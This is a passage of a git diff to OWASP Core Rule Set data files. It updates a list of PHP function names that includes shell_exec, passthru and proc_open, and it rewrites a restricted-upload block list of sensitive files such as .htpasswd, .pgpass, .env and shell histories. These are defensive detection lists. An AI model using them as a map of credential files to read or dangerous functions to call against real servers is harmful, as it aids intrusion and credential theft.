+mysqli_fetch_lengths
+mysqli_fetch_object
+mysqli_fetch_row
+mysqli_field_count
+mysqli_field_seek
+mysqli_field_tell
+mysqli_free_result
+mysqli_get_charset
+mysqli_get_client_info
 mysqli_get_client_stats
 mysqli_get_client_version
+mysqli_get_connection_stats
+mysqli_get_host_info
 mysqli_get_links_stats
-mysqli_get_metadata
-mysqli_master_query
-mysqli_param_count
+mysqli_get_proto_info
+mysqli_get_server_info
+mysqli_get_server_version
+mysqli_get_warnings
+mysqli_info
+mysqli_init
+mysqli_insert_id
+mysqli_kill
+mysqli_more_results
+mysqli_multi_query
+mysqli_next_result
+mysqli_num_fields
+mysqli_num_rows
+mysqli_options
+mysqli_ping
+mysqli_poll
+mysqli_prepare
+mysqli_query
+mysqli_real_connect
+mysqli_real_escape_string
+mysqli_real_query
+mysqli_reap_async_query
+mysqli_refresh
+mysqli_release_savepoint
 mysqli_report
-mysqli_rpl_parse_enabled
-mysqli_rpl_probe
-mysqli_send_long_data
-mysqli_slave_query
-mysqlnd_memcache_get_config
-mysqlnd_memcache_set
-mysqlnd_ms_dump_servers
-mysqlnd_ms_fabric_select_global
-mysqlnd_ms_fabric_select_shard
-mysqlnd_ms_get_last_gtid
-mysqlnd_ms_get_last_used_connection
-mysqlnd_ms_get_stats
-mysqlnd_ms_match_wild
-mysqlnd_ms_query_is_select
-mysqlnd_ms_set_qos
-mysqlnd_ms_set_user_pick_server
-mysqlnd_ms_xa_begin
-mysqlnd_ms_xa_commit
-mysqlnd_ms_xa_gc
-mysqlnd_ms_xa_rollback
-mysqlnd_qc_clear_cache
-mysqlnd_qc_get_available_handlers
-mysqlnd_qc_get_cache_info
-mysqlnd_qc_get_core_stats
-mysqlnd_qc_get_normalized_query_trace_log
-mysqlnd_qc_get_query_trace_log
-mysqlnd_qc_set_cache_condition
-mysqlnd_qc_set_is_select
-mysqlnd_qc_set_storage_handler
-mysqlnd_qc_set_user_handlers
-mysqlnd_uh_convert_to_mysqlnd
-mysqlnd_uh_set_connection_proxy
-mysqlnd_uh_set_statement_proxy
+mysqli_rollback
+mysqli_savepoint
+mysqli_select_db
+mysqli_set_charset
+mysqli_sqlstate
+mysqli_ssl_set
+mysqli_stat
+mysqli_stmt_affected_rows
+mysqli_stmt_attr_get
+mysqli_stmt_attr_set
+mysqli_stmt_bind_param
+mysqli_stmt_bind_result
+mysqli_stmt_close
+mysqli_stmt_data_seek
+mysqli_stmt_errno
+mysqli_stmt_error
+mysqli_stmt_error_list
+mysqli_stmt_execute
+mysqli_stmt_fetch
+mysqli_stmt_field_count
+mysqli_stmt_free_result
+mysqli_stmt_get_result
+mysqli_stmt_get_warnings
+mysqli_stmt_init
+mysqli_stmt_insert_id
+mysqli_stmt_more_results
+mysqli_stmt_next_result
+mysqli_stmt_num_rows
+mysqli_stmt_param_count
+mysqli_stmt_prepare
+mysqli_stmt_reset
+mysqli_stmt_result_metadata
+mysqli_stmt_send_long_data
+mysqli_stmt_sqlstate
+mysqli_stmt_store_result
+mysqli_store_result
+mysqli_thread_id
+mysqli_thread_safe
+mysqli_use_result
+mysqli_warning_count
 natcasesort
+natsort
 net_get_interfaces
 ngettext
 nl2br
 nl_langinfo
-nsapi_request_headers
-nsapi_response_headers
-nsapi_virtual
-nthmac
-number_format
-oauth_get_sbs
-oauth_urlencode
+normalizer_get_raw_decomposition
+normalizer_is_normalized
+normalizer_normalize
+numfmt_create
+numfmt_format
+numfmt_format_currency
+numfmt_get_attribute
+numfmt_get_error_code
+numfmt_get_error_message
+numfmt_get_locale
+numfmt_get_pattern
+numfmt_get_symbol
+numfmt_get_text_attribute
+numfmt_parse
+numfmt_parse_currency
+numfmt_set_attribute
+numfmt_set_pattern
+numfmt_set_symbol
+numfmt_set_text_attribute
+ob_clean
+ob_end_clean
+ob_end_flush
+ob_flush
+ob_get_clean
+ob_get_contents
+ob_get_flush
 ob_get_length
 ob_get_level
 ob_get_status
 ob_gzhandler
-ob_iconv_handler
 ob_implicit_flush
 ob_list_handlers
-ob_tidyhandler
+oci_bind_array_by_name
+oci_bind_by_name
+oci_cancel
+oci_client_version
+oci_close
+oci_collection_append
+oci_collection_assign
+oci_collection_element_assign
+oci_collection_element_get
+oci_collection_max
+oci_collection_size
+oci_collection_trim
+oci_commit
+oci_connect
+oci_define_by_name
+oci_error
+oci_execute
+oci_fetch
+oci_fetch_all
+oci_fetch_array
+oci_fetch_assoc
+oci_fetch_object
+oci_fetch_row
+oci_field_is_null
+oci_field_name
+oci_field_precision
+oci_field_scale
+oci_field_size
+oci_field_type
+oci_field_type_raw
+oci_free_collection
+oci_free_descriptor
+oci_free_statement
+oci_get_implicit_resultset
+oci_lob_append
+oci_lob_copy
+oci_lob_eof
+oci_lob_erase
+oci_lob_export
+oci_lob_flush
+oci_lob_import
+oci_lob_is_equal
+oci_lob_load
+oci_lob_read
+oci_lob_rewind
+oci_lob_save
+oci_lob_seek
+oci_lob_size
+oci_lob_tell
+oci_lob_truncate
+oci_lob_write
+oci_new_collection
+oci_new_connect
+oci_new_cursor
+oci_new_descriptor
+oci_num_fields
+oci_num_rows
+oci_parse
+oci_password_change
+oci_pconnect
+oci_register_taf_callback
+oci_result
+oci_rollback
+oci_server_version
+oci_set_action
+oci_set_call_timeout
+oci_set_client_identifier
+oci_set_client_info
+oci_set_db_operation
+oci_set_edition
+oci_set_module_name
+oci_set_prefetch
+oci_set_prefetch_lob
+oci_statement_type
+oci_unregister_taf_callback
+ocifetchinto
+ocigetbufferinglob
+ocisetbufferinglob
+octdec
 odbc_autocommit
 odbc_binmode
 odbc_close
@@ -653,11 +1280,16 @@ odbc_close_all
 odbc_columnprivileges
 odbc_columns
 odbc_commit
+odbc_connect
+odbc_connection_string_is_quoted
+odbc_connection_string_quote
+odbc_connection_string_should_quote
 odbc_cursor
 odbc_data_source
-odbc_do
 odbc_error
 odbc_errormsg
+odbc_exec
+odbc_execute
 odbc_fetch_array
 odbc_fetch_into
 odbc_fetch_object
@@ -665,7 +1297,6 @@ odbc_fetch_row
 odbc_field_len
 odbc_field_name
 odbc_field_num
-odbc_field_precision
 odbc_field_scale
 odbc_field_type
 odbc_foreignkeys
@@ -680,6 +1311,8 @@ odbc_prepare
 odbc_primarykeys
 odbc_procedurecolumns
 odbc_procedures
+odbc_result
+odbc_result_all
 odbc_rollback
 odbc_setoption
 odbc_specialcolumns
@@ -692,8 +1325,15 @@ opcache_get_status
 opcache_invalidate
 opcache_is_script_cached
 opcache_reset
+opendir
+openlog
 openssl_cipher_iv_length
 openssl_cipher_key_length
+openssl_cms_decrypt
+openssl_cms_encrypt
+openssl_cms_read
+openssl_cms_sign
+openssl_cms_verify
 openssl_csr_export
 openssl_csr_export_to_file
 openssl_csr_get_public_key
@@ -705,13 +1345,10 @@ openssl_dh_compute_key
 openssl_digest
 openssl_encrypt
 openssl_error_string
-openssl_free_key
 openssl_get_cert_locations
 openssl_get_cipher_methods
 openssl_get_curve_names
 openssl_get_md_methods
-openssl_get_privatekey
-openssl_get_publickey
 openssl_open
 openssl_pbkdf2
 openssl_pkcs12_export
@@ -719,15 +1356,16 @@ openssl_pkcs12_export_to_file
 openssl_pkcs12_read
 openssl_pkcs7_decrypt
 openssl_pkcs7_encrypt
+openssl_pkcs7_read
 openssl_pkcs7_sign
 openssl_pkcs7_verify
+openssl_pkey_derive
 openssl_pkey_export
 openssl_pkey_export_to_file
 openssl_pkey_free
 openssl_pkey_get_details
 openssl_pkey_get_private
 openssl_pkey_get_public
-openssl_pkey_derive
 openssl_pkey_new
 openssl_private_decrypt
 openssl_private_encrypt
@@ -752,20 +1390,22 @@ openssl_x509_read
 openssl_x509_verify
 output_add_rewrite_var
 output_reset_rewrite_vars
-override_function
+parse_ini_file
 parse_ini_string
-parse_url
-parsekit_compile_file
-parsekit_compile_string
-parsekit_func_arginfo
+parse_str
+passthru
 password_algos
 password_get_info
 password_hash
 password_needs_rehash
 password_verify
+pathinfo
+pclose
 pcntl_alarm
 pcntl_async_signals
-pcntl_errno
+pcntl_exec
+pcntl_fork
+pcntl_forkx
 pcntl_get_last_error
 pcntl_getpriority
 pcntl_rfork
@@ -781,15 +1421,19 @@ pcntl_unshare
 pcntl_wait
 pcntl_waitpid
 pcntl_wexitstatus
+pcntl_wifcontinued
 pcntl_wifexited
 pcntl_wifsignaled
 pcntl_wifstopped
 pcntl_wstopsig
 pcntl_wtermsig
+pdo_drivers
+pfsockopen
 pg_affected_rows
 pg_cancel_query
 pg_client_encoding
 pg_close
+pg_connect
 pg_connect_poll
 pg_connection_busy
 pg_connection_reset
@@ -801,10 +1445,13 @@ pg_copy_to
 pg_dbname
 pg_delete
 pg_end_copy
+pg_enter_pipeline_mode
 pg_escape_bytea
 pg_escape_identifier
 pg_escape_literal
 pg_escape_string
+pg_execute
+pg_exit_pipeline_mode
 pg_fetch_all
 pg_fetch_all_columns
 pg_fetch_array
@@ -820,6 +1467,8 @@ pg_field_size
 pg_field_table
 pg_field_type
 pg_field_type_oid
+pg_fieldisnull
+pg_fieldprtlen
 pg_flush
 pg_free_result
 pg_get_notify
@@ -849,8 +1498,12 @@ pg_options
 pg_parameter_status
 pg_pconnect
 pg_ping
+pg_pipeline_status
+pg_pipeline_sync
 pg_port
+pg_prepare
 pg_put_line
+pg_query
 pg_query_params
 pg_result_error
 pg_result_error_field
@@ -862,6 +1515,7 @@ pg_send_prepare
 pg_send_query
 pg_send_query_params
 pg_set_client_encoding
+pg_set_error_context_visibility
 pg_set_error_verbosity
 pg_socket
 pg_trace
@@ -871,28 +1525,53 @@ pg_unescape_bytea
 pg_untrace
 pg_update
 pg_version
-php_check_syntax
 php_ini_loaded_file
 php_ini_scanned_files
-php_logo_guid
 php_sapi_name
+php_strip_whitespace
+php_uname
 phpcredits
-png2wbmp
+phpdbg_break_file
+phpdbg_break_function
+phpdbg_break_method
+phpdbg_break_next
+phpdbg_clear
+phpdbg_color
+phpdbg_end_oplog
+phpdbg_exec
+phpdbg_get_executable
+phpdbg_prompt
+phpdbg_start_oplog
+phpinfo
+phpversion
 posix_access
 posix_ctermid
-posix_errno
+posix_eaccess
+posix_fpathconf
 posix_get_last_error
+posix_getcwd
+posix_getegid
+posix_geteuid
+posix_getgid
 posix_getgrgid
 posix_getgrnam
 posix_getgroups
+posix_getlogin
 posix_getpgid
 posix_getpgrp
 posix_getpid
 posix_getppid
+posix_getpwnam
+posix_getpwuid
 posix_getrlimit
 posix_getsid
+posix_getuid
 posix_initgroups
 posix_isatty
+posix_kill
+posix_mkfifo
+posix_mknod
+posix_pathconf
 posix_setegid
 posix_seteuid
 posix_setgid
@@ -901,18 +1580,57 @@ posix_setrlimit
 posix_setsid
 posix_setuid
 posix_strerror
+posix_sysconf
 posix_times
+posix_ttyname
+posix_uname
 preg_filter
 preg_grep
 preg_last_error
+preg_last_error_msg
+preg_match_all
 preg_quote
+preg_replace_callback
+preg_replace_callback_array
+preg_split
+proc_close
+proc_get_status
+proc_nice
+proc_open
+proc_terminate
 property_exists
+pspell_add_to_personal
+pspell_add_to_session
+pspell_check
+pspell_clear_session
+pspell_config_create
+pspell_config_data_dir
+pspell_config_dict_dir
+pspell_config_ignore
+pspell_config_mode
+pspell_config_personal
+pspell_config_repl
+pspell_config_runtogether
+pspell_config_save_repl
+pspell_new
+pspell_new_config
+pspell_new_personal
+pspell_save_wordlist
+pspell_store_replacement
+pspell_suggest
+putenv
 quoted_printable_decode
 quoted_printable_encode
+quotemeta
 rad2deg
 random_bytes
 random_int
-rar_wrapper_cache_stats
+rawurldecode
+rawurlencode
+readdir
+readfile
+readgzfile
+readline
 readline_add_history
 readline_callback_handler_install
 readline_callback_handler_remove
@@ -925,33 +1643,32 @@ readline_on_new_line
 readline_read_history
 readline_redisplay
 readline_write_history
+readlink
 realpath
 realpath_cache_get
 realpath_cache_size
-recode_file
-recode_string
+register_shutdown_function
+register_tick_function
+resourcebundle_count
+resourcebundle_create
+resourcebundle_get
+resourcebundle_get_error_code
+resourcebundle_get_error_message
+resourcebundle_locales
 restore_error_handler
 restore_exception_handler
-restore_include_path
+rewind
 rewinddir
 rmdir
-rpm_close
-rpm_get_tag
-rpm_is_valid
-rpm_open
-rpm_version
-rrdc_disconnect
-runkit_class_adopt
-runkit_class_emancipate
-runkit_constant_remove
-runkit_function_remove
-runkit_import
-runkit_lint
-runkit_lint_file
-runkit_method_remove
-runkit_return_value_used
-runkit_sandbox_output_handler
-runkit_superglobals
+rsort
+sapi_windows_cp_conv
+sapi_windows_cp_get
+sapi_windows_cp_is_utf8
+sapi_windows_cp_set
+sapi_windows_generate_ctrl_event
+sapi_windows_set_ctrl_handler
+sapi_windows_vt100_support
+scandir
 sem_acquire
 sem_get
 sem_release
@@ -959,7 +1676,6 @@ sem_remove
 session_abort
 session_cache_expire
 session_cache_limiter
-session_commit
 session_create_id
 session_decode
 session_destroy
@@ -967,33 +1683,28 @@ session_encode
 session_gc
 session_get_cookie_params
 session_id
-session_is_registered
 session_module_name
 session_name
-session_pgsql_add_error
-session_pgsql_get_error
-session_pgsql_get_field
-session_pgsql_reset
-session_pgsql_set_field
-session_pgsql_status
 session_regenerate_id
-session_register
 session_register_shutdown
 session_reset
 session_save_path
 session_set_cookie_params
+session_set_save_handler
+session_start
 session_status
-session_unregister
 session_unset
 session_write_close
-set_file_buffer
-set_socket_blocking
+set_error_handler
+set_exception_handler
+set_include_path
 set_time_limit
 setcookie
 setlocale
-setproctitle
 setrawcookie
-setthreadtitle
+sha1
+sha1_file
+shell_exec
 shm_attach
 shm_detach
 shm_get_var
@@ -1007,21 +1718,49 @@ shmop_open
 shmop_read
 shmop_size
 shmop_write
+similar_text
 simplexml_import_dom
+simplexml_load_file
+simplexml_load_string
+sinh
+snmp2_get
+snmp2_getnext
+snmp2_real_walk
+snmp2_set
+snmp2_walk
+snmp3_get
+snmp3_getnext
+snmp3_real_walk
+snmp3_set
+snmp3_walk
+snmp_get_quick_print
+snmp_get_valueretrieval
+snmp_read_mib
+snmp_set_enum_print
+snmp_set_oid_output_format
+snmp_set_quick_print
+snmp_set_valueretrieval
+snmpget
+snmpgetnext
+snmprealwalk
+snmpset
+snmpwalk
 socket_accept
 socket_addrinfo_bind
 socket_addrinfo_connect
 socket_addrinfo_explain
 socket_addrinfo_lookup
+socket_atmark
 socket_bind
 socket_clear_error
 socket_close
 socket_cmsg_space
+socket_connect
+socket_create
 socket_create_listen
 socket_create_pair
+socket_export_stream
 socket_get_option
-socket_get_status
-socket_getopt
 socket_getpeername
 socket_getsockname
 socket_import_stream
@@ -1036,15 +1775,118 @@ socket_send
 socket_sendmsg
 socket_sendto
 socket_set_block
-socket_set_blocking
 socket_set_nonblock
 socket_set_option
-socket_set_timeout
-socket_setopt
 socket_shutdown
 socket_strerror
 socket_write
-solr_get_version
+socket_wsaprotocol_info_export
+socket_wsaprotocol_info_import
+socket_wsaprotocol_info_release
+sodium_add
+sodium_base642bin
+sodium_bin2base64
+sodium_bin2hex
+sodium_compare
+sodium_crypto_aead_aes256gcm_decrypt
+sodium_crypto_aead_aes256gcm_encrypt
+sodium_crypto_aead_aes256gcm_is_available
+sodium_crypto_aead_aes256gcm_keygen
+sodium_crypto_aead_chacha20poly1305_decrypt
+sodium_crypto_aead_chacha20poly1305_encrypt
+sodium_crypto_aead_chacha20poly1305_ietf_decrypt
+sodium_crypto_aead_chacha20poly1305_ietf_encrypt
+sodium_crypto_aead_chacha20poly1305_ietf_keygen
+sodium_crypto_aead_chacha20poly1305_keygen
+sodium_crypto_aead_xchacha20poly1305_ietf_decrypt
+sodium_crypto_aead_xchacha20poly1305_ietf_encrypt
+sodium_crypto_aead_xchacha20poly1305_ietf_keygen
+sodium_crypto_auth
+sodium_crypto_auth_keygen
+sodium_crypto_auth_verify
+sodium_crypto_box
+sodium_crypto_box_keypair
+sodium_crypto_box_keypair_from_secretkey_and_publickey
+sodium_crypto_box_open
+sodium_crypto_box_publickey
+sodium_crypto_box_publickey_from_secretkey
+sodium_crypto_box_seal
+sodium_crypto_box_seal_open
+sodium_crypto_box_secretkey
+sodium_crypto_box_seed_keypair
+sodium_crypto_core_ristretto255_add
+sodium_crypto_core_ristretto255_from_hash
+sodium_crypto_core_ristretto255_is_valid_point
+sodium_crypto_core_ristretto255_random
+sodium_crypto_core_ristretto255_scalar_add
+sodium_crypto_core_ristretto255_scalar_complement
+sodium_crypto_core_ristretto255_scalar_invert
+sodium_crypto_core_ristretto255_scalar_mul
+sodium_crypto_core_ristretto255_scalar_negate
+sodium_crypto_core_ristretto255_scalar_random
+sodium_crypto_core_ristretto255_scalar_reduce
+sodium_crypto_core_ristretto255_scalar_sub
+sodium_crypto_core_ristretto255_sub
+sodium_crypto_generichash
+sodium_crypto_generichash_final
+sodium_crypto_generichash_init
+sodium_crypto_generichash_keygen
+sodium_crypto_generichash_update
+sodium_crypto_kdf_derive_from_key
+sodium_crypto_kdf_keygen
+sodium_crypto_kx_client_session_keys
+sodium_crypto_kx_keypair
+sodium_crypto_kx_publickey
+sodium_crypto_kx_secretkey
+sodium_crypto_kx_seed_keypair
+sodium_crypto_kx_server_session_keys
+sodium_crypto_pwhash
+sodium_crypto_pwhash_scryptsalsa208sha256
+sodium_crypto_pwhash_scryptsalsa208sha256_str
+sodium_crypto_pwhash_scryptsalsa208sha256_str_verify
+sodium_crypto_pwhash_str
+sodium_crypto_pwhash_str_needs_rehash
+sodium_crypto_pwhash_str_verify
+sodium_crypto_scalarmult
+sodium_crypto_scalarmult_ristretto255
+sodium_crypto_scalarmult_ristretto255_base
+sodium_crypto_secretbox
+sodium_crypto_secretbox_keygen
+sodium_crypto_secretbox_open
+sodium_crypto_secretstream_xchacha20poly1305_init_pull
+sodium_crypto_secretstream_xchacha20poly1305_init_push
+sodium_crypto_secretstream_xchacha20poly1305_keygen
+sodium_crypto_secretstream_xchacha20poly1305_pull
+sodium_crypto_secretstream_xchacha20poly1305_push
+sodium_crypto_secretstream_xchacha20poly1305_rekey
+sodium_crypto_shorthash
+sodium_crypto_shorthash_keygen
+sodium_crypto_sign
+sodium_crypto_sign_detached
+sodium_crypto_sign_ed25519_pk_to_curve25519
+sodium_crypto_sign_ed25519_sk_to_curve25519
+sodium_crypto_sign_keypair
+sodium_crypto_sign_keypair_from_secretkey_and_publickey
+sodium_crypto_sign_open
+sodium_crypto_sign_publickey
+sodium_crypto_sign_publickey_from_secretkey
+sodium_crypto_sign_secretkey
+sodium_crypto_sign_seed_keypair
+sodium_crypto_sign_verify_detached
+sodium_crypto_stream
+sodium_crypto_stream_keygen
+sodium_crypto_stream_xchacha20
+sodium_crypto_stream_xchacha20_keygen
+sodium_crypto_stream_xchacha20_xor
+sodium_crypto_stream_xchacha20_xor_ic
+sodium_crypto_stream_xor
+sodium_hex2bin
+sodium_increment
+sodium_memcmp
+sodium_memzero
+sodium_pad
+sodium_unpad
+soundex
 spl_autoload
 spl_autoload_call
 spl_autoload_extensions
@@ -1054,94 +1896,39 @@ spl_autoload_unregister
 spl_classes
 spl_object_hash
 spl_object_id
-sql_regcase
-sqlite_busy_timeout
-sqlite_changes
-sqlite_close
-sqlite_column
-sqlite_current
-sqlite_error_string
-sqlite_escape_string
-sqlite_factory
-sqlite_fetch_all
-sqlite_fetch_array
-sqlite_fetch_column_types
-sqlite_fetch_object
-sqlite_fetch_single
-sqlite_fetch_string
-sqlite_field_name
-sqlite_has_more
-sqlite_has_prev
-sqlite_key
-sqlite_last_error
-sqlite_last_insert_rowid
-sqlite_libencoding
-sqlite_libversion
-sqlite_next
-sqlite_num_fields
-sqlite_num_rows
-sqlite_prev
-sqlite_rewind
-sqlite_seek
-sqlite_udf_decode_binary
-sqlite_udf_encode_binary
-sqlite_valid
-sqlsrv_begin_transaction
-sqlsrv_cancel
-sqlsrv_client_info
-sqlsrv_close
-sqlsrv_commit
-sqlsrv_configure
-sqlsrv_connect
-sqlsrv_errors
-sqlsrv_execute
-sqlsrv_fetch
-sqlsrv_fetch_array
-sqlsrv_fetch_object
-sqlsrv_field_metadata
-sqlsrv_free_stmt
-sqlsrv_get_config
-sqlsrv_get_field
-sqlsrv_has_rows
-sqlsrv_next_result
-sqlsrv_num_fields
-sqlsrv_num_rows
-sqlsrv_prepare
-sqlsrv_query
-sqlsrv_rollback
-sqlsrv_rows_affected
-sqlsrv_send_stream_data
-sqlsrv_server_info
+sprintf
+sqrt
 sscanf
-ssdeep_fuzzy_compare
-ssdeep_fuzzy_hash
-ssdeep_fuzzy_hash_filename
-stomp_connect_error
-stomp_version
+str_contains
+str_decrement
+str_ends_with
 str_getcsv
+str_increment
 str_ireplace
 str_pad
 str_repeat
-str_replace
+str_rot13
 str_shuffle
 str_split
+str_starts_with
 str_word_count
 strcasecmp
-strchr
 strcmp
+strcoll
 strcspn
 stream_bucket_append
 stream_bucket_make_writeable
 stream_bucket_new
 stream_bucket_prepend
+stream_context_create
 stream_context_get_default
 stream_context_get_options
 stream_context_get_params
 stream_context_set_default
 stream_context_set_option
+stream_context_set_options
 stream_context_set_params
 stream_copy_to_stream
-stream_encoding
 stream_filter_append
 stream_filter_prepend
 stream_filter_register
@@ -1152,10 +1939,8 @@ stream_get_line
 stream_get_meta_data
 stream_get_transports
 stream_get_wrappers
-stream_isatty
 stream_is_local
-stream_notification_callback
-stream_register_wrapper
+stream_isatty
 stream_resolve_include_path
 stream_select
 stream_set_blocking
@@ -1164,6 +1949,7 @@ stream_set_read_buffer
 stream_set_timeout
 stream_set_write_buffer
 stream_socket_accept
+stream_socket_client
 stream_socket_enable_crypto
 stream_socket_get_name
 stream_socket_pair
@@ -1176,31 +1962,59 @@ stream_wrapper_register
 stream_wrapper_restore
 stream_wrapper_unregister
 strftime
-strip_tags
+stripcslashes
 stripos
+stripslashes
 stristr
 strnatcasecmp
 strnatcmp
 strncasecmp
 strncmp
 strpbrk
-strpos
 strptime
 strrchr
+strrev
 strripos
 strrpos
+strspn
 strstr
 strtok
-strtolower
-strtotime
-strtoupper
 strtr
 strval
 substr_compare
 substr_count
 substr_replace
+sys_get_temp_dir
 sys_getloadavg
-tcpwrap_check
+tanh
+tempnam
+test1
+test2
+textdomain
+tidy_access_count
+tidy_clean_repair
+tidy_config_count
+tidy_diagnose
+tidy_error_count
+tidy_get_body
+tidy_get_config
+tidy_get_error_buffer
+tidy_get_head
+tidy_get_html
+tidy_get_html_ver
+tidy_get_opt_doc
+tidy_get_output
+tidy_get_release
+tidy_get_root
+tidy_get_status
+tidy_getopt
+tidy_is_xhtml
+tidy_is_xml
+tidy_parse_file
+tidy_parse_string
+tidy_repair_file
+tidy_repair_string
+tidy_warning_count
 time_nanosleep
 time_sleep_until
 timezone_abbreviations_list
@@ -1212,40 +2026,64 @@ timezone_offset_get
 timezone_open
 timezone_transitions_get
 timezone_version_get
+tmpfile
 token_get_all
 token_name
 trait_exists
+transliterator_create
+transliterator_create_from_rules
+transliterator_create_inverse
+transliterator_get_error_code
+transliterator_get_error_message
+transliterator_list_ids
+transliterator_transliterate
 trigger_error
+uasort
 ucwords
+uksort
+umask
+uniqid
 unixtojd
 unregister_tick_function
+urldecode
 use_soap_error_handler
-user_error
+usleep
+usort
 utf8_decode
 utf8_encode
+var_dump
 var_export
+variant_abs
+variant_add
+variant_and
+variant_cast
+variant_cat
+variant_cmp
+variant_date_from_timestamp
+variant_date_to_timestamp
+variant_div
+variant_eqv
+variant_fix
+variant_get_type
+variant_idiv
+variant_imp
+variant_int
+variant_mod
+variant_mul
+variant_neg
+variant_not
+variant_or
+variant_pow
+variant_round
+variant_set
+variant_set_type
+variant_sub
+variant_xor
 version_compare
 vfprintf
 vprintf
 vsprintf
-win32_continue_service
-win32_create_service
-win32_delete_service
-win32_get_last_control_message
-win32_pause_service
-win32_ps_list_procs
-win32_ps_stat_mem
-win32_ps_stat_proc
-win32_query_service_status
-win32_set_service_status
-win32_start_service
-win32_start_service_ctrl_dispatcher
-win32_stop_service
-xattr_get
-xattr_list
-xattr_remove
-xattr_set
-xattr_supported
+wordwrap
 xml_error_string
 xml_get_current_byte_index
 xml_get_current_column_number
@@ -1268,28 +2106,86 @@ xml_set_object
 xml_set_processing_instruction_handler
 xml_set_start_namespace_decl_handler
 xml_set_unparsed_entity_decl_handler
-xmlrpc_decode
-xmlrpc_decode_request
-xmlrpc_encode
-xmlrpc_encode_request
-xmlrpc_get_type
-xmlrpc_is_fault
-xmlrpc_parse_method_descriptions
-xmlrpc_server_add_introspection_data
-xmlrpc_server_call_method
-xmlrpc_server_create
-xmlrpc_server_destroy
-xmlrpc_server_register_introspection_callback
-xmlrpc_server_register_method
-xmlrpc_set_type
-yaml_emit
-yaml_emit_file
-yaml_parse
-yaml_parse_file
-yaml_parse_url
-zend_logo_guid
+xmlwriter_end_attribute
+xmlwriter_end_cdata
+xmlwriter_end_comment
+xmlwriter_end_document
+xmlwriter_end_dtd
+xmlwriter_end_dtd_attlist
+xmlwriter_end_dtd_element
+xmlwriter_end_dtd_entity
+xmlwriter_end_element
+xmlwriter_end_pi
+xmlwriter_flush
+xmlwriter_full_end_element
+xmlwriter_open_memory
+xmlwriter_open_uri
+xmlwriter_output_memory
+xmlwriter_set_indent
+xmlwriter_set_indent_string
+xmlwriter_start_attribute
+xmlwriter_start_attribute_ns
+xmlwriter_start_cdata
+xmlwriter_start_comment
+xmlwriter_start_document
+xmlwriter_start_dtd
+xmlwriter_start_dtd_attlist
+xmlwriter_start_dtd_element
+xmlwriter_start_dtd_entity
+xmlwriter_start_element
+xmlwriter_start_element_ns
+xmlwriter_start_pi
+xmlwriter_text
+xmlwriter_write_attribute
+xmlwriter_write_attribute_ns
+xmlwriter_write_cdata
+xmlwriter_write_comment
+xmlwriter_write_dtd
+xmlwriter_write_dtd_attlist
+xmlwriter_write_dtd_element
+xmlwriter_write_dtd_entity
+xmlwriter_write_element
+xmlwriter_write_element_ns
+xmlwriter_write_pi
+xmlwriter_write_raw
+zend_call_method
+zend_create_unterminated_string
+zend_get_current_func_name
+zend_get_map_ptr_last
+zend_get_unit_enum
+zend_iterable
+zend_iterable_legacy
+zend_leak_bytes
+zend_leak_variable
+zend_number_or_string
+zend_number_or_string_or_null
+zend_string_or_object
+zend_string_or_object_or_null
+zend_string_or_stdclass
+zend_string_or_stdclass_or_null
+zend_terminate_string
+zend_test_array_return
+zend_test_compile_string
+zend_test_crash
+zend_test_create_throwing_resource
+zend_test_deprecated
+zend_test_fill_packed_array
+zend_test_func
+zend_test_is_string_marked_as_valid_utf8
+zend_test_nullable_array_return
+zend_test_override_libxml_global_state
+zend_test_parameter_with_attribute
+zend_test_void_return
+zend_test_zend_call_stack_get
+zend_test_zend_call_stack_use_all
+zend_test_zend_ini_parse_quantity
+zend_test_zend_ini_parse_uquantity
+zend_test_zend_ini_str
 zend_thread_id
 zend_version
+zend_weakmap_attach
+zend_weakmap_dump
+zend_weakmap_remove
 zip_close
 zip_entry_close
 zip_entry_compressedsize
@@ -1300,5 +2196,6 @@ zip_entry_open
 zip_entry_read
 zip_open
 zip_read
+zlib_decode
 zlib_encode
 zlib_get_coding_type
diff --git a/rules/@owasp_crs/restricted-upload.data b/rules/@owasp_crs/restricted-upload.data
index fcc8ae3..faba803 100644
--- a/rules/@owasp_crs/restricted-upload.data
+++ b/rules/@owasp_crs/restricted-upload.data
@@ -1,20 +1,168 @@
-# Apache webserver
+# This list can be generated from restricted-files.data by running the following shell command:
+# body_start=$(grep -n -E -m 1 '^[^#$]' rules/restricted-upload.data | cut -d: -f1)
+# ed -s rules/restricted-upload.data <<EOF
+# $((body_start - 1)),\$d
+# w
+# q
+# EOF
+# words="$(awk ' !/^#/ {split($0, segments, "/")} {word = segments[length(segments)]} length(word) > 3 {print word}' rules/restricted-files.data | \
+#   sort | uniq)"
+.DS_Store
+.addressbook
+.bash_
+.bashrc
+.bowerrc
+.cshrc
+.docker
+.env
+.eslintignore
+.eslintrc
+.fbcindex
+.forward
+.gitattributes
+.gitconfig
+.gitignore
+.gitlab-ci.yml
+.google_authenticator
+.hgignore
 .htaccess
 .htdigest
 .htpasswd
-# WordPress configuration file
-wp-config.php
-# Symfony configuration files
+.idea
+.jshintrc
+.ksh_history
+.lesshst
+.lhistory
+.lighttpdpassword
+.lldb-history
+.lynx_cookies
+.my.cnf
+.mysql_history
+.nano_history
+.node_repl_history
+.nsconfig
+.nsr
+.oh-my-
+.password-store
+.pearrc
+.pgpass
+.php_cs.dist
+.php_history
+.phpcs.xml
+.phpcs.xml.dist
+.pinerc
+.proclog
+.procmailrc
+.profile
+.psql_history
+.python_history
+.rediscli_history
+.rhistory
+.rhosts
+.sh_history
+.sqlite_history
+.tcshrc
+.travis.yml
+.user.ini
+.viminfo
+.vimrc
+.ws_ftp.ini
+.www_acl
+.wwwacl
+.xauthority
+.zhistory
+.zsh_history
+.zshrc
+Desktop.ini
+Dockerfile
+Thumbs.db
+Web.config
+acpi
+asound
+auth.json
+bootconfig
+bower.json
+buddyinfo
+cgroups
+cmdline
+composer.json
+composer.lock
+config.gz
+config.php
 config.yml
 config_dev.yml
 config_prod.yml
 config_test.yml
+cpuinfo
+database.yml
+default.settings.php
+diskstats
+dynamic_debug
+execdomains
+filesystems
+gruntfile.js
+hplip.conf
+hypervisor
+iomem
+ioports
+ipmi
+kallsyms
+kcore
+key-users
+kmsg
+kpagecgroup
+kpagecount
+kpageflags
+latency_stats
+loadavg
+local.xml
+mdstat
+meminfo
+mtrr
+notify-osd.log
+npm-debug.log
+npm-shrinkwrap.json
+ormconfig.json
+package-lock.json
+package.json
+packages.json
+pagetypeinfo
+parameters.php
 parameters.yml
+php.ini
+php_error.log
+php_errors.log
+phpcs.xml
+phpcs.xml.dist
 routing.yml
+sched_debug
+schedstat
 security.yml
 services.yml
-default.settings.php
